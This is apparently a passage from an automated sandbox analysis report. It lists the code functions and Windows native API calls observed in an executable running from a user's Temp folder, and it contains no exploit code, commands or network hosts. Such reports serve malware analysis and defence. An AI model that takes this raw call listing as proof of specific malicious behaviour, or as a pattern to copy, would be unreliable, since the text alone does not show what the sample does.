Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9860 ZwQuerySystemInformation,LdrInitializeThunk, 24_2_6B4B9860
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9820 ZwEnumerateKey,LdrInitializeThunk, 24_2_6B4B9820
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B98C0 ZwDuplicateObject,LdrInitializeThunk, 24_2_6B4B98C0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9780 ZwMapViewOfSection,LdrInitializeThunk, 24_2_6B4B9780
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9660 ZwAllocateVirtualMemory,LdrInitializeThunk, 24_2_6B4B9660
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B967A NtQueryInformationProcess,LdrInitializeThunk, 24_2_6B4B967A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9600 ZwOpenKey,LdrInitializeThunk, 24_2_6B4B9600
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A3B48 ZwClose,ZwClose, 24_2_6B4A3B48
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548B58 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B548B58
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B508372 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString, 24_2_6B508372
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B486B6B ZwQueryAttributesFile,RtlDeleteBoundaryDescriptor, 24_2_6B486B6B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F7365 RtlRunOnceExecuteOnce,ZwQuerySystemInformation,RtlCaptureContext,memset,RtlReportException, 24_2_6B4F7365
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BAB60 ZwReleaseKeyedEvent, 24_2_6B4BAB60
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A3B7A RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap, 24_2_6B4A3B7A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B506365 RtlAllocateHeap,ZwQueryVirtualMemory,memcpy,wcsrchr,RtlFreeHeap,RtlAllocateHeap,memcpy, 24_2_6B506365
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472B7E ZwSetInformationThread,ZwClose, 24_2_6B472B7E
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B526369 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose, 24_2_6B526369
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BAB70 ZwReleaseWorkerFactoryWorker, 24_2_6B4BAB70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B474B00 TpCallbackMayRunLong,TpCallbackMayRunLong,ZwSetInformationWorkerFactory, 24_2_6B474B00
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B53131B RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B53131B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9B00 ZwSetValueKey, 24_2_6B4B9B00
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A5306 ZwReleaseKeyedEvent, 24_2_6B4A5306
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B479335 ZwClose,ZwClose, 24_2_6B479335
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472BC2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose, 24_2_6B472BC2
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B48A3E0 RtlFormatCurrentUserKeyPath,ZwQueryInformationToken,RtlLengthSidAsUnicodeString,RtlAppendUnicodeToString,RtlConvertSidToUnicodeString,RtlFreeUnicodeString, 24_2_6B48A3E0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4723F6 ZwClose,RtlFreeHeap, 24_2_6B4723F6
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9BF0 ZwAlertThreadByThreadId, 24_2_6B4B9BF0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472B93 TpSetDefaultPoolMaxThreads,ZwDuplicateToken, 24_2_6B472B93
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A939F RtlInitializeCriticalSectionEx,ZwDelayExecution, 24_2_6B4A939F
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B53138A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B53138A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BA390 ZwGetCachedSigningLevel, 24_2_6B4BA390
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548BB6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B548BB6
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A4BAD RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 24_2_6B4A4BAD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B549BBE RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B549BBE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BA3A0 ZwGetCompleteWnfStateSubscription, 24_2_6B4BA3A0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B531BA8 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B531BA8
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B479240 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap, 24_2_6B479240
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B501242 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose, 24_2_6B501242
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9A50 ZwCreateFile, 24_2_6B4B9A50
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548A62 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B548A62
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548214 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive, 24_2_6B548214
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9A00 ZwProtectVirtualMemory, 24_2_6B4B9A00
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475210 RtlGetCurrentDirectory_U,memcpy,RtlGetCurrentDirectory_U,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 24_2_6B475210
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A229 ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint, 24_2_6B49A229
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B474A20 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll, 24_2_6B474A20
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BAA20 ZwQuerySecurityAttributesToken, 24_2_6B4BAA20
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B504A28 ZwOpenKey,DbgPrintEx,ZwQueryValueKey,DbgPrintEx,DbgPrintEx,memcpy,ZwClose, 24_2_6B504A28
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AB230 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,EtwEventWrite, 24_2_6B4AB230
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9A30 ZwTerminateThread, 24_2_6B4B9A30
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B478239 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose, 24_2_6B478239
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B501AD6 ZwFreeVirtualMemory, 24_2_6B501AD6
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548ADD RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B548ADD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BAAC0 ZwQueryWnfStateNameInformation, 24_2_6B4BAAC0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49FAD0 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockShared,ZwTerminateProcess, 24_2_6B49FAD0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9AE0 ZwTraceEvent, 24_2_6B4B9AE0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BAAE0 ZwRaiseException, 24_2_6B4BAAE0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ADA88 RtlAcquireSRWLockExclusive,RtlImageNtHeader,RtlAllocateHeap,ZwUnmapViewOfSection,ZwClose,RtlReAllocateHeap, 24_2_6B4ADA88
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B492280 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,ZwTerminateProcess, 24_2_6B492280
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BB280 ZwWow64DebuggerCall, 24_2_6B4BB280
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47429E RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption, 24_2_6B47429E
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BAA90 ZwQuerySystemInformationEx, 24_2_6B4BAA90
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AD294 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap, 24_2_6B4AD294
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4752A5 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwFsControlFile,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection, 24_2_6B4752A5
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B471AA0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap, 24_2_6B471AA0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47BAA0 RtlpLoadMachineUIByPolicy,RtlInitUnicodeString,ZwOpenKey,RtlpLoadMachineUIByPolicy,ZwClose, 24_2_6B47BAA0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A5AA0 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMaxThreads, 24_2_6B4A5AA0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AE2BB ZwWaitForAlertByThreadId, 24_2_6B4AE2BB
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9AB0 ZwWaitForMultipleObjects, 24_2_6B4B9AB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49B944 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,RtlGetCurrentServiceSessionId,ZwSetTimer2,RtlGetCurrentServiceSessionId,ZwCancelTimer2, 24_2_6B49B944
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47F150 RtlOpenCurrentUser,RtlFormatCurrentUserKeyPath,ZwOpenKey,RtlFreeUnicodeString,RtlOpenCurrentUser,RtlInitUnicodeString,ZwOpenKey, 24_2_6B47F150
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47395E RtlAcquireSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwGetCompleteWnfStateSubscription,RtlFreeHeap, 24_2_6B47395E
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BB150 ZwUnsubscribeWnfStateChange, 24_2_6B4BB150
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B501976 ZwCreateEvent, 24_2_6B501976
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BB160 ZwUpdateWnfStateData, 24_2_6B4BB160
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BA160 ZwCreateWorkerFactory, 24_2_6B4BA160
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548966 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B548966
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47B171 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException, 24_2_6B47B171
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AD976 ZwCreateFile,ZwCreateFile, 24_2_6B4AD976
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B479100 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,TpReleasePool,TpReleasePool,RtlDebugPrintTimes,TpReleasePool, 24_2_6B479100
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B480100 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,LdrUnloadAlternateResourceModuleEx,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap, 24_2_6B480100
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9900 ZwOpenEvent, 24_2_6B4B9900
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B515100 RtlAssert,RtlCaptureContext,DbgPrintEx,DbgPrompt,ZwTerminateThread,DbgPrintEx,RtlAssert,ZwTerminateProcess, 24_2_6B515100
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B494120 RtlAllocateHeap,memmove,memmove,RtlPrefixUnicodeString,RtlAllocateHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlFreeHeap, 24_2_6B494120
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B50193B ZwRaiseException,ZwTerminateProcess, 24_2_6B50193B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9920 ZwDuplicateToken, 24_2_6B4B9920
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B54F13B ZwOpenKey,ZwCreateKey, 24_2_6B54F13B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BA130 ZwCreateWaitCompletionPacket, 24_2_6B4BA130
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5019C8 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose, 24_2_6B5019C8
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5489E7 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B5489E7
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49C182 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive, 24_2_6B49C182
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9980 ZwCreateEvent, 24_2_6B4B9980
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BB180 ZwWaitForAlertByThreadId, 24_2_6B4BB180
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B526186 ZwQueryValueKey,memmove,RtlInitUnicodeString, 24_2_6B526186
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47519E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 24_2_6B47519E
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B53A189 RtlAcquireSRWLockExclusive,ZwGetNlsSectionPtr,RtlAllocateHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive, 24_2_6B53A189
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9990 ZwQueryVolumeInformationFile, 24_2_6B4B9990
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B54F1B5 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap, 24_2_6B54F1B5
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BB1A0 ZwWaitForKeyedEvent, 24_2_6B4BB1A0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F51BE ZwQuerySystemInformation,ZwQuerySystemInformationEx,RtlAllocateHeap,ZwQuerySystemInformationEx,RtlFindCharInUnicodeString,RtlEnterCriticalSection,memcpy, 24_2_6B4F51BE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AC9BF DbgPrintEx,wcsrchr,memcpy,DbgPrintEx,ZwClose,DbgPrintEx,DbgPrintEx,RtlDosPathNameToRelativeNtPathName_U,DbgPrintEx,ZwOpenFile,ZwClose,RtlFreeHeap,DbgPrintEx,DbgPrintEx,DbgPrintEx,RtlDeleteBoundaryDescriptor,ZwClose,RtlFreeHeap, 24_2_6B4AC9BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5349A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 24_2_6B5349A4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BA9B0 ZwQueryLicenseValue, 24_2_6B4BA9B0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9840 ZwDelayExecution, 24_2_6B4B9840
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548858 ZwAlertThreadByThreadId, 24_2_6B548858
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475050 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlSetCurrentDirectory_U,RtlFreeHeap,RtlFreeHeap, 24_2_6B475050
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9850 ZwQueryDirectoryFile, 24_2_6B4B9850
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B48106F ZwOpenKey,ZwClose, 24_2_6B48106F
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B501879 ZwAllocateVirtualMemory,memset,RtlInitializeSid, 24_2_6B501879
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B54F019 RtlInitUnicodeString,RtlInitUnicodeString,ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap, 24_2_6B54F019
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47F018 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap, 24_2_6B47F018
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A4020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion, 24_2_6B4A4020
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9830 ZwOpenFile, 24_2_6B4B9830
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4770C0 ZwClose,RtlFreeHeap,RtlFreeHeap, 24_2_6B4770C0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B00C2 ZwAlertThreadByThreadId, 24_2_6B4B00C2
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B98D0 ZwQueryAttributesFile, 24_2_6B4B98D0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BA0D0 ZwCreateTimer2, 24_2_6B4BA0D0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B10D7 ZwOpenKey,ZwCreateKey, 24_2_6B4B10D7
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47B8F0 TpSetPoolStackInformation,ZwSetInformationWorkerFactory, 24_2_6B47B8F0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4740FD RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess, 24_2_6B4740FD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5260E9 ZwOpenKey,ZwClose,ZwClose, 24_2_6B5260E9
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52E0E9 RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwClose,RtlFreeHeap, 24_2_6B52E0E9
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B108B ZwClose, 24_2_6B4B108B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B473880 TpSetWaitEx,RtlAllocateHeap,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,TpSetWaitEx, 24_2_6B473880
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AA080 RtlDeleteCriticalSection,RtlAcquireSRWLockExclusive,RtlDeleteCriticalSection,RtlDeleteCriticalSection,ZwClose,RtlDeleteCriticalSection, 24_2_6B4AA080
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49E090 RtlWow64EnableFsRedirectionEx,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 24_2_6B49E090
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BA890 ZwQueryDebugFilterState, 24_2_6B4BA890
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9890 ZwFsControlFile, 24_2_6B4B9890
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49F0AE ZwSetInformationWorkerFactory, 24_2_6B49F0AE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5260A2 ZwQueryInformationFile, 24_2_6B5260A2
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A18B9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose, 24_2_6B4A18B9
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AF0BF ZwOpenFile,RtlFreeHeap,ZwQueryVolumeInformationFile,RtlAllocateHeap,memcpy,ZwClose,ZwClose,RtlFreeHeap, 24_2_6B4AF0BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BB0B0 ZwTraceControl, 24_2_6B4BB0B0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A174B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory, 24_2_6B4A174B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B0F48 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose, 24_2_6B4B0F48
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4FA746 ZwGetCachedSigningLevel,ZwCompareSigningLevels,ZwSetCachedSigningLevel, 24_2_6B4FA746
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9740 ZwOpenThreadToken, 24_2_6B4B9740
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B505F5F RtlInitUnicodeString,ZwOpenFile,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlAllocateHeap,RtlInitUnicodeString,ZwQueryDirectoryFile,RtlAllocateHeap,memcpy,RtlFreeHeap,ZwClose, 24_2_6B505F5F
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9750 ZwQueryInformationThread, 24_2_6B4B9750
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ACF6A memcpy,memcpy,RtlDosPathNameToRelativeNtPathName_U,ZwOpenFile,memcpy,RtlFreeHeap,RtlDeleteBoundaryDescriptor,DbgPrintEx,DbgPrintEx,DbgPrintEx,ZwClose,RtlFreeHeap,DbgPrintEx,memcpy,DbgPrintEx,ZwClose, 24_2_6B4ACF6A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52CF70 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose, 24_2_6B52CF70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B476F60 RtlGetPersistedStateLocation,ZwOpenKey,memcpy,RtlGetPersistedStateLocation,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwQueryValueKey,RtlExpandEnvironmentStrings,memcpy,ZwClose,ZwClose,RtlFreeHeap, 24_2_6B476F60
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BAF60 ZwSetTimer2, 24_2_6B4BAF60
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9F70 ZwCreateIoCompletion, 24_2_6B4B9F70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9770 ZwSetInformationFile, 24_2_6B4B9770
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B50176C ZwOpenEvent,ZwWaitForSingleObject,ZwClose, 24_2_6B50176C
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548F6A RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B548F6A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B506715 memset,memcpy,ZwTraceEvent, 24_2_6B506715
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A9702 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker, 24_2_6B4A9702
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9710 ZwQueryInformationToken, 24_2_6B4B9710
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52CF30 ZwAlertThreadByThreadId, 24_2_6B52CF30
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AE730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 24_2_6B4AE730
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9730 ZwQueryVirtualMemory, 24_2_6B4B9730
